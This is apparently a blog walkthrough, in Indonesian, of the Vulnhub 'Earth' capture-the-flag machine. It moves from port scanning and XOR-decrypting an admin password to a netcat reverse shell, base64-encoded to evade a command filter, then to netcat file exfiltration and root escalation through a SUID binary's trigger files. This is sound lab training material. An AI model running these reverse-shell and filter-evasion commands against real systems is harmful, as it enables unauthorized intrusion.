Walkthrough The Planet Series - Earth (Vulnhub)
· 12 min read
Methodology
- Reconnaissance
- Enumeration
- Root Privilege Escalation
1. Reconnaissance
- identify IP address
fping -aqg 192.168.33.0/24
result :
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ fping -aqg 192.168.33.0/24
192.168.33.1
192.168.33.2
192.168.33.3
192.168.33.5
192.168.33.9
target : 192.168.33.9
- scan open ports
nmap -v -T4 -p- -sC -sV -oN nmap.log 192.168.33.9
result:
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nmap -v -T4 -p- -sC -sV -oN nmap.log 192.168.33.9 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 14:40 WIB
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating Ping Scan at 14:40
Scanning 192.168.33.9 [2 ports]
Completed Ping Scan at 14:40, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:40
Completed Parallel DNS resolution of 1 host. at 14:40, 2.52s elapsed
Initiating Connect Scan at 14:40
Scanning 192.168.33.9 [65535 ports]
Discovered open port 443/tcp on 192.168.33.9
Discovered open port 22/tcp on 192.168.33.9
Discovered open port 80/tcp on 192.168.33.9
Connect Scan Timing: About 14.52% done; ETC: 14:43 (0:03:03 remaining)
Connect Scan Timing: About 29.78% done; ETC: 14:43 (0:02:24 remaining)
Connect Scan Timing: About 44.52% done; ETC: 14:43 (0:01:53 remaining)
Connect Scan Timing: About 61.69% done; ETC: 14:43 (0:01:15 remaining)
Connect Scan Timing: About 80.55% done; ETC: 14:43 (0:00:36 remaining)
Completed Connect Scan at 14:43, 182.13s elapsed (65535 total ports)
Initiating Service scan at 14:43
Scanning 3 services on 192.168.33.9
Completed Service scan at 14:43, 12.05s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.33.9.
Initiating NSE at 14:43
Completed NSE at 14:43, 0.60s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 1.22s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Nmap scan report for 192.168.33.9
Host is up (0.0019s latency).
Not shown: 65345 filtered tcp ports (no-response), 187 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after: 2031-10-10T23:26:31
| MD5: 4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
NSE: Script Post-scanning.
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.90 seconds
kita menemukan open port 22/ssh , 80/http dan 443/ssl.
dari sertifikat SSL di atas, kita menemukan 2 hostnames.
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
jadi saya coba tambahkan ini di file /etc/hosts.
192.168.33.9 earth.local terratest.earth.local
2. Enumerate Webserver
kita coba akses via browser earh.local.
pada halaman tersebut, kita menemukan pesan terenkripsi yang ter-sign dg sebuah kunci.
Oleh karena itu, kita harus mengidentifikasi teknik enkripsi. Namun, karena kita tahu itu menggunakan kunci pesan, kita harus mengidentifikasinya terlebih dahulu.
Informasi ini terletak di robots.txt dari situs terratest.earth.local.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/robots.txt -k
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*
Di sini, kita bisa melihat ada file “testingnotes.*” . Karena ini adalah catatan, saya kira itu adalah file .txt.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
Dari catatan, kita dapat mengonfirmasi bahwa algoritma enkripsi adalah XOR dan kuncinya mungkin dari testdata.txt. Begitu juga username untuk admin portal adalah terra. Juga, portal admin adalah /admin di situs web lain.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/testdata.txt -k
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Dengan informasi ini, kita membuka CyberChef dan mencari XOR. Kita meletakkan teks di atas di bagian penting CyberChef dengan input UTF-8. Pesan berikut memberi kita kemungkinan kata sandi dari user terra.
kita akan mencoba menginputkan :
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
dengan key untuk XOR :
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
output :
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
kita akan mencoba akun terra:earthclimatechangebad4humans pada halaman login admin earth.local/admin.
Ketika saya mencoba menelurkan shell terbalik, dikatakan bahwa koneksi jarak jauh dilarang. Ini karena saya menggunakan alamat IP. Jadi, kita dapat melewati ini dengan mengubahnya menjadi notasi desimalnya. Atau, kita dapat mengkodekan perintah dalam format base64.
Gateway Timeout
The gateway did not receive a timely response from the upstream server or application.
try :
echo 'nc -e /bin/bash 192.168.33.5 9001' | base64
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ echo 'nc -e /bin/bash 192.168.33.5 9001' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAxCg==
kemudian saya listened port 9001
nc -nlvp 9001
masukkan command berikut pada halaman web untuk run command.
echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAxCg== | base64 -d | bash
hasil :
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.33.5] from (UNKNOWN) [192.168.33.9] 50356
yes, we're in !
gunakan ini untuk [upgrade to an intelligent reverse shell] (https://nepcodex.com/2021/06/upgrade-to-an-intelligent-reverse-shell/)
python3 -c 'import pty;pty.spawn("/bin/bash")'
hasil :
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$
3. Root Privilege Escalation
Setelah saya memiliki shell yang tepat, saya memeriksa SUID binaries.
find / -perm -u=s 2>/dev/null
hasil :
bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root # ekskalasi dari sini.
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
Ketika saya memeriksa string, saya melihat bahwa itu akan mengubah kata sandi user root.
strings /usr/bin/reset_root
hasil :
bash-5.1$ strings /usr/bin/reset_root
strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
GCC: (GNU) 11.1.1 20210531 (Red Hat 11.1.1-3)
GCC: (GNU) 11.2.1 20210728 (Red Hat 11.2.1-1)
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
/usr/lib/gcc/x86_64-redhat-linux/11/../../../../lib64/crt1.o
.annobin_lto
.annobin_lto_end
.annobin_lto.hot
.annobin_lto_end.hot
.annobin_lto.unlikely
.annobin_lto_end.unlikely
.annobin_lto.startup
.annobin_lto_end.startup
.annobin_lto.exit
.annobin_lto_end.exit
__abi_tag
.annobin__dl_relocate_static_pie.start
.annobin__dl_relocate_static_pie.end
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
reset_root_3.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
magic_cipher
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
_dl_relocate_static_pie
__bss_start
main
access@GLIBC_2.2.5
__TMC_END__
setuid@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment
.gnu.build.attributes
hilight :
bash-5.1$ strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
# ... snip ...
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
magic_cipher
# ... snip ...
main
access@GLIBC_2.2.5
__TMC_END__
setuid@GLIBC_2.2.5
# ... snip ...
Namun, ketika saya menjalankan skrip, saya mendapat pesan RESET FAILED, ... Jadi, saya menyalin biner ke mesin lokal saya.
saya close port 9001
dan coba koneksi ulang menggunakan port 9002
┌──(nel㉿nelliel)-[~]
└─$ echo 'nc -e /bin/bash 192.168.33.5 9002' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAyCg==
nc -nlvp 9002 > reset_root
cat /usr/bin/reset_root
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nc -nlvp 9002 > reset_root
listening on [any] 9002 ...
connect to [192.168.33.5] from (UNKNOWN) [192.168.33.9] 39752
cat /usr/bin/reset_root
exit
beda source : by the incridible world of n0x - on YouTube
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ ./reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ sudo apt install strace
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ strace -f ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffeddcbe7d8 /* 55 vars */) = 0
brk(NULL) = 0x1267000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=71299, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 71299, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f7054255000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\320\276\243\212\v\307^\t\263h8\371\266h\r\350"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1835120, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7054253000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1868664, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f705408a000
mprotect(0x7f70540b0000, 1654784, PROT_NONE) = 0
mmap(0x7f70540b0000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f70540b0000
mmap(0x7f70541f8000, 307200, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16e000) = 0x7f70541f8000
mmap(0x7f7054244000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b9000) = 0x7f7054244000
mmap(0x7f705424a000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f705424a000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7054088000
arch_prctl(ARCH_SET_FS, 0x7f7054254580) = 0
mprotect(0x7f7054244000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7f7054296000, 8192, PROT_READ) = 0
munmap(0x7f7054255000, 71299) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
brk(NULL) = 0x1267000
brk(0x1288000) = 0x1288000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
hilight :
/dev/shm/kHgTFI5G
/dev/shm/Zw7bV9U5
/tmp/kcM0Wewe
buka netcat kembali
nc -nlvp 9002
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
reset root password :
/usr/bin/reset_root
yes, we did it! root passwarod alrady reset to Earth
coba akses root
bash-5.1$ su
su
Password: Earth
[root@earth /]# ls
ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
[root@earth /]# cd /root/
cd /root/
[root@earth ~]# ls
ls
anaconda-ks.cfg root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]#
referensi: nepcodex.com by Krishna Upadhyay
